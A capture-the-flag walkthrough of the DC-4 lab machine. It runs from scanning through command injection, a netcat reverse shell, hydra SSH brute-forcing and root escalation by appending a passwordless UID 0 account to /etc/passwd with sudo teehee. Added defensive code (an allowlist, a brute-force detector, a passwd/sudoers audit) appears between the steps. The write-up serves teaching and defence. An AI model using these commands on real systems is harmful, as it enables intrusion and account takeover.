DC-4 target machine penetration walkthrough
- Lab environment: Kali and DC-4 (both VMs must use the same network adapter type; NAT mode is used here)
- Kali: 192.168.200.3, DC-4: 192.168.200.4
- Use ifconfig to check Kali's own IP, then run nmap against that subnet to find DC-4's IP
```
┌──(root💀kali)-[/home/shiqi/桌面]
└─# nmap -sP 192.168.200.0/24
```
Information gathering: the service scan shows ports 22 (SSH) and 80 (HTTP) open
```
┌──(root💀kali)-[/home/shiqi/桌面]
└─# nmap -sV 192.168.200.4
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-19 15:18 CST
Nmap scan report for 192.168.200.4
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    nginx 1.15.10
MAC Address: 00:0C:29:D1:99:66 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Visit the web port: open DC-4's IP address in a browser (the page's hint gives the login account as admin)
Directory scan with the dirb command
```
┌──(root💀kali)-[/usr/share/wordlists]
└─# dirb http://192.168.200.4
START_TIME: Tue Apr 19 19:52:14 2022
URL_BASE: http://192.168.200.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.200.4/ ----
==> DIRECTORY: http://192.168.200.4/css/
==> DIRECTORY: http://192.168.200.4/images/
+ http://192.168.200.4/index.php (CODE:200|SIZE:506)
---- Entering directory: http://192.168.200.4/css/ ----
---- Entering directory: http://192.168.200.4/images/ ----
-----------------
END_TIME: Tue Apr 19 19:52:24 2022
DOWNLOADED: 13836 - FOUND: 1
```
## The admin login page is therefore http://192.168.200.4/index.php
Brute-forcing the password (I used Burp's brute-force function); screenshots of the steps are omitted
## The recovered password is happy. After logging in there are only three options in the panel; capturing the request with Burp shows that the command parameter can be replaced with other commands, and they run
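The panel above fails because the value of a request parameter ends up in a shell. The allowlisted dispatcher below is an added example of the fix, written for this page; it is not code from the DC-4 box or this walkthrough (which never shows command.php). The action names and the three commands are assumptions chosen to mirror the "three options" in the panel.

```python
"""Allowlisted command dispatch for a web admin panel (added example)."""
import subprocess
from typing import List, Optional

# Each action maps to a fixed argv list. No shell ever parses these, so a
# replaced parameter value such as "ls; whoami" cannot become a command;
# it simply fails the lookup. (Action names and commands are assumed.)
ALLOWED_COMMANDS = {
    "list_home": ["ls", "-l", "/home"],
    "disk_usage": ["df", "-h"],
    "processes": ["ps", "-ef"],
}


def resolve_command(choice: str) -> Optional[List[str]]:
    """Map a request parameter to an argv list, or None if it is not one of
    the fixed actions. Exact match only: no stripping, no prefix matching."""
    return ALLOWED_COMMANDS.get(choice)


def run_action(choice: str) -> str:
    """Execute a known action without a shell and return its stdout.
    Unknown actions are refused before anything is executed."""
    argv = resolve_command(choice)
    if argv is None:
        return "error: unknown action"
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    for choice in ("list_home", "whoami", "list_home; whoami"):
        print(f"{choice!r} -> {run_action(choice)[:60]!r}")
```

The key property is that the parameter is used as a dictionary key, never as text handed to `sh -c`; the request can only select an action, not describe one.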
Reverse shell
```
┌──(root💀kali)-[/etc/network/interfaces.d]
└─# nc -lvp 7777
listening on [any] 7777 ...
192.168.200.4: inverse host lookup failed: Unknown host
connect to [192.168.200.3] from (UNKNOWN) [192.168.200.4] 36838
ls
command.php
css
images
whoami
www-data
cd /home
ls
charles
jim
sam
ls -l
ls -lh sam
total 0
ls -lh charles
total 0
ls -lh jim
total 12K
drwxr-xr-x 2 jim jim 4.0K Apr  7  2019 backups
-rw------- 1 jim jim  528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh
ls
backups  mbox  test.sh
```
The jim account stands out. Entering jim's home directory shows three entries; the backups directory contains old-passwd.bak, which looks like a password list, so copy its contents into a new text file on Kali. The mbox file cannot be read from this shell (no permission).
Brute-force the SSH password with hydra using that list; the recovered password is jibril04
```
┌──(root💀kali)-[/home/shiqi/桌面]
└─# hydra -l jim -P passwd -T 64 ssh://192.168.200.4:22
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-19 21:30:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://192.168.200.4:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 77 to do in 00:01h, 16 active
[22][ssh] host: 192.168.200.4   login: jim   password: jibril04
```
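From the target's side, the hydra run above is about 178 failed SSH logins per minute against one account from one source address, and every one of them is recorded by OpenSSH in auth.log. The detector below is an added example written for this page, not part of the walkthrough: it groups "Failed password" lines by source IP and flags any source with a burst of failures inside a short window. The log lines it parses are constructed samples that imitate the syslog format, not captures from DC-4; the threshold and window values are assumptions.

```python
"""Detect SSH password-guessing bursts in OpenSSH auth.log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH failure line in syslog format; the timestamp carries no year.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_ts(ts: str, year: int = 2022) -> datetime:
    """Syslog timestamps omit the year, so one is supplied (assumed 2022)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {src_ip: {"attempts": n, "users": [...]}} for every source that
    produced at least `threshold` failed logins inside any `window_seconds`
    span. Uses a sliding window over the sorted failure times per source."""
    events = defaultdict(list)  # ip -> [(time, user)]
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            events[m["ip"]].append((parse_ts(m["ts"]), m["user"]))

    hits = {}
    for ip, evs in events.items():
        evs.sort()
        left = 0
        for right in range(len(evs)):
            while (evs[right][0] - evs[left][0]).total_seconds() > window_seconds:
                left += 1
            if right - left + 1 >= threshold:
                hits[ip] = {
                    "attempts": len(evs),
                    "users": sorted({u for _, u in evs}),
                }
                break
    return hits


# Constructed sample log: 20 failures in 20 seconds from one source against
# jim (the pattern a password-list attack produces), two slow failures from
# another source, and one successful login that must not be counted.
SAMPLE_LOG = [
    f"Apr 19 21:30:{sec:02d} dc-4 sshd[{1500 + sec}]: Failed password for jim "
    f"from 192.168.200.3 port {40000 + sec} ssh2"
    for sec in range(4, 24)
] + [
    "Apr 19 21:31:10 dc-4 sshd[1600]: Failed password for invalid user oracle from 10.0.0.5 port 51000 ssh2",
    "Apr 19 21:40:10 dc-4 sshd[1601]: Failed password for invalid user oracle from 10.0.0.5 port 51001 ssh2",
    "Apr 19 21:32:01 dc-4 sshd[1602]: Accepted password for jim from 192.168.200.3 port 40100 ssh2",
]


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} failed logins, users {info['users']}")
```

On a real host, feed the function the lines of /var/log/auth.log (or `journalctl -u ssh` output in the same format); the slow second source in the sample shows why the window matters, since two failures nine minutes apart are ordinary typos, not an attack.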
Log in as jim
```
┌──(root💀kali)-[/home/shiqi/桌面]
└─# ssh jim@192.168.200.4
jim@dc-4:~$ su root
Password:
su: Authentication failure
```
Trying to switch straight to root fails.
```
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
```
Looking again at the file that could not be read in the previous step, it is now readable: it is an email sent locally by the root user.
```
jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
Password is:  ^xHhA&hvim0y
```
This gives the password for the user charles: ^xHhA&hvim0y
Switch to the charles user
```
jim@dc-4:/var/mail$ su charles
Password:
charles@dc-4:/var/mail$ sudo -l
    (root) NOPASSWD: /usr/bin/teehee
```
Checking for privilege escalation: sudo -l shows that teehee can be run as root without a password.
Create an admin account with UID 0 and an empty password field, so it can be switched to without a password
```
charles@dc-4:/var/mail$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
admin::0:0:::/bin/bash
charles@dc-4:/var/mail$ su admin
root@dc-4:/var/mail# ls
jim
root@dc-4:/var/mail# whoami
root
```
Use find to locate the flag file:
```
root@dc-4:/etc# find / -name flag*
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/root/flag.txt
root@dc-4:/etc# cd /root
root@dc-4:/root# cat flag.txt
```
The flag is displayed, which means the box is complete.
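The final step leaves two durable traces on the host: a second UID 0 account in /etc/passwd, and an entry whose password field is empty rather than the "x" that defers to /etc/shadow. The sudoers rule that made it possible is a third. The audit below is an added example written for this page, not part of the walkthrough or the DC-4 box: it reads passwd and sudoers text and reports exactly those three conditions. The inputs are constructed samples (the sudoers line is an assumed form of the rule `sudo -l` reported above); pass the contents of the real files to run it on a host.

```python
"""Audit passwd and sudoers text for UID 0 clones, empty passwords and
NOPASSWD rules (added example)."""
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    source: str   # "passwd" or "sudoers"
    line: str     # the offending line, verbatim
    reason: str   # human-readable explanation


def audit_passwd(passwd_text: str) -> List[Finding]:
    """Flag non-root accounts with UID 0 and accounts whose password field
    is empty (which lets su/login succeed without any password)."""
    findings = []
    for raw in passwd_text.splitlines():
        if not raw or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append(Finding("passwd", raw, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append(Finding("passwd", raw, f"non-root account {name} has UID 0"))
        if pw == "":
            findings.append(Finding("passwd", raw, f"account {name} has an empty password field"))
    return findings


# Matches "user HOST=(runas) NOPASSWD: cmd, cmd"; Defaults/aliases are skipped.
NOPASSWD_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*NOPASSWD:\s*(?P<cmds>.+)$"
)


def audit_sudoers(sudoers_text: str) -> List[Finding]:
    """Flag every NOPASSWD rule so a reviewer can judge whether the allowed
    binary can write files (tee-like tools, editors, shells)."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = NOPASSWD_RE.match(line)
        if m:
            findings.append(Finding(
                "sudoers", raw,
                f"{m['who']} runs {m['cmds'].strip()} as ({m['runas']}) with NOPASSWD",
            ))
    return findings


# Constructed samples reproducing the end state of the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1001:1001::/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""

SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
charles ALL=(root) NOPASSWD: /usr/bin/teehee
"""


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD) + audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

Reading /etc/sudoers and the files under /etc/sudoers.d needs root, so this is a check to run from a configuration-management or host-audit job rather than from an ordinary user session.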